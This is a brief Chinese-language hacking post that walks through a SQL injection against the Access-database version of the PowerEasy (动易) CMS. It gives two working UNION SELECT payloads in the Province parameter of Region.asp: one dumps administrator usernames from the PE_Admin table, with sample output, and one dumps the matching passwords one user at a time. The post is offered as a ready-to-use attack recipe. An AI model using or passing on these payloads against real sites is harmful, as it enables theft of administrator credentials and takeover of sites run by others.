发现有很多人对access版本的动易搞不明白,于是今天写个简单的,其实就是基本的注入语句。
http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1
先暴所有管理员帐号。
admin
haha
whytt
然后
http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+password+from+PE_Admin+where+username="admin"+and+'1'='1
然后争对管理员名暴密码
依次改改username="这里写暴出的用户名"
这样就可以精确的暴出相对应的用户和密码。
作者:whytt